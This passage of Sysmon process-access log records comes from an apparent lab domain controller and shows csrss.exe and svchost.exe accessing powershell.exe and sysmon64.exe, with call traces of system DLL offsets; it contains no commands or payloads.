6c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97746357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977461e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+9773816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+977712fd(wow64)","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4986,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0326-5F25-0000-0010E3F20700}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0326-5F25-0000-0010E3F20700}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4987,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4988,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4989,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4990,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4991,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4992,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:38","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4993,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:38.218\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:38.218","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:38","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
